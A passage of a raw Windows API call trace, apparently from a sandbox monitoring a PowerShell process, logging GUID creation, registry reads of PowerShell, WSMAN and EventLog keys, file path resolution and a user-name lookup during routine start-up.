Data2=0x2c5f, Data3=0x40bc, Data4=([0]=0xb0, [1]=0x68, [2]=0x8, [3]=0x81, [4]=0x40, [5]=0x79, [6]=0x72, [7]=0x7b))) returned 0x0 [0078.738] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9bbd00c6, Data2=0x2915, Data3=0x4ace, Data4=([0]=0x8a, [1]=0x1, [2]=0x9d, [3]=0x6d, [4]=0x96, [5]=0x66, [6]=0x3b, [7]=0x65))) returned 0x0 [0078.739] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x3b7a346d, Data2=0x8f40, Data3=0x4e13, Data4=([0]=0x9b, [1]=0xba, [2]=0xf5, [3]=0x11, [4]=0x83, [5]=0xb9, [6]=0x1d, [7]=0x69))) returned 0x0 [0078.739] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x5f5ecdb6, Data2=0x6882, Data3=0x4f47, Data4=([0]=0x9d, [1]=0x6f, [2]=0x64, [3]=0xc, [4]=0xd2, [5]=0xa2, [6]=0xac, [7]=0xf8))) returned 0x0 [0078.739] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xdbb4bcdf, Data2=0xa7a3, Data3=0x4fbe, Data4=([0]=0xab, [1]=0x7a, [2]=0x6a, [3]=0x2b, [4]=0x97, [5]=0x29, [6]=0x76, [7]=0xcb))) returned 0x0 [0078.739] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x8f843b7f, Data2=0xd4c, Data3=0x4ae5, Data4=([0]=0xa0, [1]=0xc2, [2]=0x50, [3]=0x11, [4]=0xbd, [5]=0xb5, [6]=0x5, [7]=0xba))) returned 0x0 [0078.739] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x54fdd413, Data2=0x4b4c, Data3=0x416d, Data4=([0]=0x97, [1]=0xe9, [2]=0xa4, [3]=0x4a, [4]=0x1d, [5]=0xb0, [6]=0x11, [7]=0xbe))) returned 0x0 [0078.740] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4c24e529, Data2=0xea5e, Data3=0x48c8, Data4=([0]=0xab, [1]=0xe5, [2]=0x3a, [3]=0xe4, [4]=0xde, [5]=0xed, [6]=0xd8, [7]=0x60))) returned 0x0 [0078.740] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xa7d0beca, Data2=0x1901, Data3=0x43d4, Data4=([0]=0x9a, [1]=0x93, [2]=0x16, [3]=0xab, [4]=0x28, [5]=0x33, [6]=0xcc, [7]=0xa6))) returned 0x0 [0078.740] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xd63e7a07, Data2=0xdbe6, Data3=0x441e, Data4=([0]=0x94, [1]=0x59, [2]=0x30, [3]=0x5a, [4]=0x28, [5]=0xde, [6]=0x88, [7]=0x1d))) returned 0x0 [0078.741] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x86cc5453, Data2=0x6ed2, Data3=0x4b51, Data4=([0]=0xa6, [1]=0xf7, [2]=0xfc, [3]=0x52, [4]=0xaf, [5]=0xd7, [6]=0x38, [7]=0x50))) returned 0x0 [0078.741] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xff5a29d, Data2=0x8327, Data3=0x45e0, Data4=([0]=0xa4, [1]=0xfb, [2]=0x8d, [3]=0x7e, [4]=0x41, [5]=0xd0, [6]=0xcc, [7]=0x44))) returned 0x0 [0078.741] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x3936e3d4, Data2=0x5b4b, Data3=0x4b95, Data4=([0]=0xa2, [1]=0x8d, [2]=0x12, [3]=0x96, [4]=0x4, [5]=0xa4, [6]=0xbf, [7]=0x3))) returned 0x0 [0078.741] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x74ac5ed3, Data2=0xc246, Data3=0x40e4, Data4=([0]=0x8b, [1]=0x5f, [2]=0x89, [3]=0x30, [4]=0x51, [5]=0x6f, [6]=0xbc, [7]=0xfb))) returned 0x0 [0078.746] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x340) returned 0x0 [0078.747] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.747] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.747] RegCloseKey (hKey=0x340) returned 0x0 [0078.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0078.747] GetLastError () returned 0x0 [0078.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0078.747] GetLastError () returned 0x0 [0078.749] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x2becd9e3, Data2=0x2ec9, Data3=0x4d86, Data4=([0]=0x99, [1]=0x29, [2]=0x3, [3]=0x5a, [4]=0x4f, [5]=0x57, [6]=0x0, [7]=0x10))) returned 0x0 [0078.749] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xdae1285c, Data2=0xcac1, Data3=0x453b, Data4=([0]=0x9e, [1]=0x2b, [2]=0x3b, [3]=0x5f, [4]=0x94, [5]=0x61, [6]=0x40, [7]=0xe6))) returned 0x0 [0078.754] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x340) returned 0x0 [0078.755] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.755] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.755] RegCloseKey (hKey=0x340) returned 0x0 [0078.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0078.755] GetLastError () returned 0x0 [0078.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0078.755] GetLastError () returned 0x0 [0078.757] VirtualQuery (in: lpAddress=0xccfa0, lpBuffer=0xcdfa0, dwLength=0x1c | out: lpBuffer=0xcdfa0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.757] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xc497583, Data2=0x4ee3, Data3=0x4fa2, Data4=([0]=0x82, [1]=0x43, [2]=0xd1, [3]=0x16, [4]=0xf9, [5]=0xf8, [6]=0x8, [7]=0xb5))) returned 0x0 [0078.759] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x30b7b98e, Data2=0x76b8, Data3=0x4d41, Data4=([0]=0x8a, [1]=0x88, [2]=0x7c, [3]=0xde, [4]=0x54, [5]=0x15, [6]=0xcb, [7]=0xca))) returned 0x0 [0078.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcdf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0078.784] GetLastError () returned 0x57 [0078.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcdf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0078.785] GetLastError () returned 0x57 [0078.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcdf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0078.804] GetLastError () returned 0x57 [0078.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcdf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0078.805] GetLastError () returned 0x57 [0078.818] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xce33c | out: phkResult=0xce33c*=0x340) returned 0x0 [0078.819] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce38c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce390, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce38c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce390*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.819] RegEnumValueW (in: hKey=0x340, dwIndex=0x0, lpValueName=0x2d1690, lpcchValueName=0xce3b4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xce3b4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0078.819] RegEnumValueW (in: hKey=0x340, dwIndex=0x1, lpValueName=0x2d1690, lpcchValueName=0xce3b4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xce3b4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0078.819] RegQueryValueExW (in: hKey=0x340, lpValueName="StackVersion", lpReserved=0x0, lpType=0xce394, lpData=0x0, lpcbData=0xce390*=0x0 | out: lpType=0xce394*=0x1, lpData=0x0, lpcbData=0xce390*=0x8) returned 0x0 [0078.819] RegQueryValueExW (in: hKey=0x340, lpValueName="StackVersion", lpReserved=0x0, lpType=0xce394, lpData=0x2d1690, lpcbData=0xce390*=0x8 | out: lpType=0xce394*=0x1, lpData="2.0", lpcbData=0xce390*=0x8) returned 0x0 [0078.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2f8 | out: phkResult=0xce2f8*=0x310) returned 0x0 [0078.909] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce348, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce34c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce348*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce34c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.909] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x2d1690, lpcchValueName=0xce370, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xce370, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0078.909] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x2d1690, lpcchValueName=0xce370, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xce370, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0078.909] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xce350, lpData=0x0, lpcbData=0xce34c*=0x0 | out: lpType=0xce350*=0x1, lpData=0x0, lpcbData=0xce34c*=0x8) returned 0x0 [0078.909] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xce350, lpData=0x2d1690, lpcbData=0xce34c*=0x8 | out: lpType=0xce350*=0x1, lpData="2.0", lpcbData=0xce34c*=0x8) returned 0x0 [0078.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.911] GetLastError () returned 0xcb [0078.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.914] GetLastError () returned 0xcb [0078.924] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2b8 | out: phkResult=0xce2b8*=0x314) returned 0x0 [0078.924] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce320, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce31c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce320*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce31c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.925] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.926] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.926] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.926] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.926] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.927] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.927] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.927] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.928] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x2d1690, lpcchName=0xce33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xce33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0078.928] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x318) returned 0x0 [0078.928] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x2 [0078.929] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x334) returned 0x0 [0078.929] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x2 [0078.929] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x344) returned 0x0 [0078.930] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x2 [0078.930] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x348) returned 0x0 [0078.930] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x2 [0078.931] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x34c) returned 0x0 [0078.931] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x2 [0078.931] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x350) returned 0x0 [0078.932] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x2 [0078.932] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x5 [0078.981] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x354) returned 0x0 [0078.981] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x0) returned 0x2 [0078.982] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x358) returned 0x0 [0078.982] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2e8 | out: phkResult=0xce2e8*=0x35c) returned 0x0 [0078.982] RegCloseKey (hKey=0x35c) returned 0x0 [0078.982] RegCloseKey (hKey=0x314) returned 0x0 [0078.982] RegCloseKey (hKey=0x358) returned 0x0 [0078.992] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce434) returned 0x1 [0078.993] GetLastError () returned 0x3 [0078.994] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.070] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce29c | out: phkResult=0xce29c*=0x314) returned 0x0 [0079.070] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce304, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce300, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce304*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce300*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.070] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.070] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.071] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.071] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.071] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.071] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.071] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.072] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.072] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.072] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x35c) returned 0x0 [0079.072] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.073] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x360) returned 0x0 [0079.073] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.073] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x364) returned 0x0 [0079.073] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.074] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x368) returned 0x0 [0079.074] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.074] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x36c) returned 0x0 [0079.076] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, 